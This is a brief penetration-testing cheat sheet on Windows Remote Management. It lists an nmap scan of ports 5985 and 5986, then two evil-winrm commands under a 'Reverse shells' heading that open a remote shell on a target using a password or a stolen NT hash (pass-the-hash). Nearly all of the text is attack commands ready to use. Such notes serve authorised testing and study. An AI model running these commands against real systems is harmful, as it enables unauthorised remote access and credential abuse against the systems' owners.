Windows Remote Management (WinRM) enumeration and exploitation

Initial enumeration

    nmap -vv -p 5985,5986 -sT <ip>

Reverse shells

    evil-winrm -i <ip> -u <username> -p <password>
    evil-winrm -i <ip> -u <username> -H <nt_hash>